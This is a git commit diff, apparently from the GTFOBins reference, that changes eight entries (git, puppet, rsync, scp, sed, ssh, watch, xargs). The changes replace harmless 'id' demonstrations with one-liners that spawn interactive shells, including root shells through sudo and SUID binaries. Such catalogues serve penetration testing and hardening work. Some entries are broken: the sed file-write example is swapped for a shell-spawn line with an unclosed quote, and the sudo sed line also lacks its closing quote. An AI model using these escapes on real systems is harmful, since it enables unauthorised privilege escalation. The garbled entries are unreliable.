Make interactive execute whenever possible

Here the trick is to restore those file descriptors (0, 1, 2) that have been
redirected (`dup2`) by the parent process.

First we need to determine which one has been redirected, for example by looking
at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0,
1 or 2 respectively, where `x` is any file descriptor number that points to the
TTY.

It may happen that no file descriptor is unchanged, in that case we can use
`tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
master
Andrea Cardaci 2018-09-07 01:00:01 +02:00
parent 5b79154cf1
commit 8eaf595fe6
8 changed files with 31 additions and 39 deletions

View File

@ -1,15 +1,9 @@
---
functions:
execute-non-interactive:
- code: |
export PAGER=/usr/bin/id
git -p help
execute-interactive:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
sudo-enabled:
- code: |
export PAGER=/usr/bin/id
sudo -E git -p help
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
suid-limited:
- code: |
export PAGER=/usr/bin/id
./git -p help
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
---

View File

@ -1,10 +1,8 @@
---
functions:
execute-non-interactive:
- description: The executed command output shown in the puppet log format.
code: |
export CMD="/usr/bin/id"
puppet apply -e "exec { '$CMD': logoutput => true }"
execute-interactive:
- code: |
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
file-write:
- description: The file path must be absolute.
code: |
@ -16,8 +14,6 @@ functions:
export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE
sudo-enabled:
- description: The executed command output shown in the puppet log format.
code: |
export CMD="/usr/bin/id"
sudo puppet apply -e "exec { '$CMD': logoutput => true }"
- code: |
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
---

View File

@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo-enabled:
- code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
suid-enabled:
- code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
---

View File

@ -1,10 +1,9 @@
---
functions:
execute-non-interactive:
execute-interactive:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
upload:
@ -22,15 +21,13 @@ functions:
sudo-enabled:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
- code: |
TF=$(mktemp)
CMD="id"
echo "$CMD" > "$TF"
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
./scp -S $TF a b:
---

View File

@ -2,14 +2,14 @@
functions:
execute-interactive:
- description: GNU version only. Also, this requires `bash`.
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
code: sed -n '1e exec sh 1>&0' /etc/hosts
execute-non-interactive:
- description: GNU version only.
code: sed -n "1e id" /etc/hosts
file-write:
- code: |
LFILE=file_to_write
sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
sed -n '1e exec sh 1>&0 /etc/hosts
file-read:
- code: |
LFILE=file_to_read
@ -20,5 +20,5 @@ functions:
./sed -e '' "$LFILE"
sudo-enabled:
- description: GNU version only. Also, this requires `bash`.
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
---

View File

@ -4,7 +4,7 @@ functions:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
upload:
- description: Send local file to a SSH server.
code: |
@ -26,5 +26,5 @@ functions:
ssh -F $LFILE localhost
sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
---

View File

@ -1,12 +1,12 @@
---
functions:
execute-non-interactive:
- code: watch /usr/bin/id
execute-interactive:
- code: watch -x sh -c 'reset; exec sh 1>&0 2>&0'
suid-enabled:
- description: This keeps the SUID privileges only if the `-x` option is present.
code: ./watch -x /usr/bin/id
code: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo-enabled:
- code: sudo watch /usr/bin/id
- code: sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'
suid-limited:
- code: ./watch /usr/bin/id
- code: ./watch 'reset; exec sh 1>&0 2>&0'
---

View File

@ -3,6 +3,11 @@ functions:
execute-interactive:
- description: GNU version only.
code: xargs -a /dev/null sh
- code: echo x | xargs -Iy sh -c 'exec sh 0<&1'
- description: Read interactively from `stdin`.
code: |
xargs -Ix sh -c 'exec sh 0<&1'
x^D^D
file-read:
- description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
code: |